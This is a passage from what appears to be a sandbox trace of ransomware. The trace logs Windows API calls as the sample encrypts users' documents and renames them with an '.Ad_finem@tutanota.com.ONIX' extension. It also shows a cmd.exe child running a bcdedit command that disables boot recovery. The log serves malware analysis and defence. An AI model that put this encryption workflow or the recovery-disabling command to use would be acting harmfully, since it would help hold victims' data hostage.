ftLastWriteTime.dwLowDateTime=0x516019b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0129.605] FindNextFileW (in: hFindFile=0x4e0e80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b163010, ftCreationTime.dwHighDateTime=0x1d5d966, ftLastAccessTime.dwLowDateTime=0xbab69d30, ftLastAccessTime.dwHighDateTime=0x1d5df2d, ftLastWriteTime.dwLowDateTime=0xbab69d30, ftLastWriteTime.dwHighDateTime=0x1d5df2d, nFileSizeHigh=0x0, nFileSizeLow=0x138fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_xvmGNQji 2.ots", cAlternateFileName="_XVMGN~1.OTS")) returned 1 [0129.605] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\_xvmGNQji 2.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\_xvmgnqji 2.ots"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x528 [0129.605] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.605] LockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x138fa, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.605] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.605] ReadFile (in: hFile=0x528, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.606] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.606] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.606] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.606] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.606] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\_xvmGNQji 2.ots", dwFileAttributes=0x80) returned 1 [0129.606] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\_xvmGNQji 2.ots") returned 65 [0129.606] GetProcessHeap () returned 0x410000 [0129.606] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf2) returned 0x431d68 [0129.606] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\_xvmGNQji 2.ots" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\_xvmGNQji 2.ots") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\_xvmGNQji 2.ots" [0129.606] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\_xvmGNQji 2.ots", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\_xvmGNQji 2.ots.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\_xvmGNQji 2.ots.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.606] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=80122) returned 1 [0129.606] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x138fa [0129.607] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.607] GetProcessHeap () returned 0x410000 [0129.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.607] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.607] WriteFile (in: hFile=0x528, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.608] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.609] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x138fa) returned 0xf70048 [0129.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x138fa) returned 0xf83950 [0129.611] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.611] ReadFile (in: hFile=0x528, lpBuffer=0xf70048, nNumberOfBytesToRead=0x138fa, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x138fa, lpOverlapped=0x0) returned 1 [0129.615] UnlockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x138fa, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.615] CloseHandle (hObject=0x528) returned 1 [0129.615] GetProcessHeap () returned 0x410000 [0129.615] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.615] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\_xvmGNQji 2.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\_xvmgnqji 2.ots"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\_xvmGNQji 2.ots.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\_xvmgnqji 2.ots.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.619] GetProcessHeap () returned 0x410000 [0129.619] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.619] FindNextFileW (in: hFindFile=0x4e0e80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b163010, ftCreationTime.dwHighDateTime=0x1d5d966, ftLastAccessTime.dwLowDateTime=0xbab69d30, ftLastAccessTime.dwHighDateTime=0x1d5df2d, ftLastWriteTime.dwLowDateTime=0xbab69d30, ftLastWriteTime.dwHighDateTime=0x1d5df2d, nFileSizeHigh=0x0, nFileSizeLow=0x138fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_xvmGNQji 2.ots", cAlternateFileName="_XVMGN~1.OTS")) returned 0 [0129.619] CloseHandle (hObject=0x3cc) returned 1 [0129.620] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.620] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x8, wMilliseconds=0x3e2)) [0129.620] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0129.620] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0129.620] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0129.620] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ9c354ca09c354b444c.lock") returned 74 [0129.620] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\12spzccruj9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0129.621] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.621] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.621] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x70) returned 0x4db030 [0129.621] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23a004d0, ftCreationTime.dwHighDateTime=0x1d5d83a, ftLastAccessTime.dwLowDateTime=0x51673dd0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x51673dd0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4e0ec0 [0129.621] FindNextFileW (in: hFindFile=0x4e0ec0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23a004d0, ftCreationTime.dwHighDateTime=0x1d5d83a, ftLastAccessTime.dwLowDateTime=0x51673dd0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x51673dd0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.622] FindNextFileW (in: hFindFile=0x4e0ec0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54b4e010, ftCreationTime.dwHighDateTime=0x1d5de69, ftLastAccessTime.dwLowDateTime=0x5791fdb0, ftLastAccessTime.dwHighDateTime=0x1d5d8ea, ftLastWriteTime.dwLowDateTime=0x5791fdb0, ftLastWriteTime.dwHighDateTime=0x1d5d8ea, nFileSizeHigh=0x0, nFileSizeLow=0xf29d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-yEB.xls", cAlternateFileName="")) returned 1 [0129.622] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\-yEB.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\12spzccruj\\-yeb.xls"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x52c [0129.622] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.622] LockFile (hFile=0x52c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf29d, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.622] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.622] ReadFile (in: hFile=0x52c, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.623] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.623] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.623] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.623] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.623] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\-yEB.xls", dwFileAttributes=0x80) returned 1 [0129.623] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\-yEB.xls") returned 60 [0129.623] GetProcessHeap () returned 0x410000 [0129.623] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe8) returned 0x467908 [0129.623] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\-yEB.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\-yEB.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\-yEB.xls" [0129.623] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\-yEB.xls", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\-yEB.xls.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\-yEB.xls.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.623] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=62109) returned 1 [0129.623] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xf29d [0129.623] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.623] GetProcessHeap () returned 0x410000 [0129.623] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.623] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.624] WriteFile (in: hFile=0x52c, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.625] WriteFile (in: hFile=0x52c, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.626] WriteFile (in: hFile=0x52c, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.627] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf29d) returned 0xf70048 [0129.628] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf29d) returned 0xf7f2f0 [0129.628] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.628] ReadFile (in: hFile=0x52c, lpBuffer=0xf70048, nNumberOfBytesToRead=0xf29d, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0xf29d, lpOverlapped=0x0) returned 1 [0129.631] UnlockFile (hFile=0x52c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf29d, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.631] CloseHandle (hObject=0x52c) returned 1 [0129.632] GetProcessHeap () returned 0x410000 [0129.632] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.632] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\-yEB.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\12spzccruj\\-yeb.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\-yEB.xls.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\12spzccruj\\-yeb.xls.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.635] GetProcessHeap () returned 0x410000 [0129.635] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0129.635] FindNextFileW (in: hFindFile=0x4e0ec0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6af16170, ftCreationTime.dwHighDateTime=0x1d5dbe7, ftLastAccessTime.dwLowDateTime=0x9afc7990, ftLastAccessTime.dwHighDateTime=0x1d5e713, ftLastWriteTime.dwLowDateTime=0x9afc7990, ftLastWriteTime.dwHighDateTime=0x1d5e713, nFileSizeHigh=0x0, nFileSizeLow=0xd9cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1sjoJeZipgEj.doc", cAlternateFileName="1SJOJE~1.DOC")) returned 1 [0129.635] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\1sjoJeZipgEj.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\12spzccruj\\1sjojezipgej.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x52c [0129.635] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.635] LockFile (hFile=0x52c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd9cb, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.635] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.635] ReadFile (in: hFile=0x52c, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.636] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.636] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.636] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.636] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.636] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\1sjoJeZipgEj.doc", dwFileAttributes=0x80) returned 1 [0129.636] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\1sjoJeZipgEj.doc") returned 68 [0129.636] GetProcessHeap () returned 0x410000 [0129.636] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf8) returned 0x431d68 [0129.636] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\1sjoJeZipgEj.doc" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\1sjoJeZipgEj.doc") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\1sjoJeZipgEj.doc" [0129.636] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\1sjoJeZipgEj.doc", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\1sjoJeZipgEj.doc.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\1sjoJeZipgEj.doc.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.636] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=55755) returned 1 [0129.636] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xd9cb [0129.637] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.637] GetProcessHeap () returned 0x410000 [0129.637] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.637] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.637] WriteFile (hFile=0x52c, lpBuffer=0x4d8e98, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0) Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 8 os_tid = 0xac0 Thread: id = 9 os_tid = 0x768 Thread: id = 10 os_tid = 0x764 Thread: id = 11 os_tid = 0x758 Thread: id = 12 os_tid = 0x724 Thread: id = 13 os_tid = 0x718 Thread: id = 14 os_tid = 0x714 Thread: id = 15 os_tid = 0x630 Thread: id = 16 os_tid = 0x154 Thread: id = 17 os_tid = 0x150 Thread: id = 18 os_tid = 0x120 Thread: id = 19 os_tid = 0x118 Thread: id = 20 os_tid = 0xf0 Thread: id = 22 os_tid = 0x820 Thread: id = 175 os_tid = 0x54c Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x33d85000" os_pid = "0x840" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x6dc" cmd_line = "/C bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 23 os_tid = 0xa48 [0044.929] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26feb0 | out: lpSystemTimeAsFileTime=0x26feb0*(dwLowDateTime=0x270a4550, dwHighDateTime=0x1d5f247)) [0044.929] GetCurrentProcessId () returned 0x840 [0044.929] GetCurrentThreadId () returned 0xa48 [0044.929] GetTickCount () returned 0x1145d1e [0044.929] QueryPerformanceCounter (in: lpPerformanceCount=0x26feb8 | out: lpPerformanceCount=0x26feb8*=16579111514) returned 1 [0044.930] GetModuleHandleW (lpModuleName=0x0) returned 0x49d20000 [0044.931] __set_app_type (_Type=0x1) [0044.931] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49d47810) returned 0x0 [0044.931] __getmainargs (in: _Argc=0x49d6a608, _Argv=0x49d6a618, _Env=0x49d6a610, _DoWildCard=0, _StartInfo=0x49d4e0f4 | out: _Argc=0x49d6a608, _Argv=0x49d6a618, _Env=0x49d6a610) returned 0 [0044.931] GetCurrentThreadId () returned 0xa48 [0044.931] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa48) returned 0x3c [0044.931] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0044.931] GetProcAddress (hModule=0x77940000, 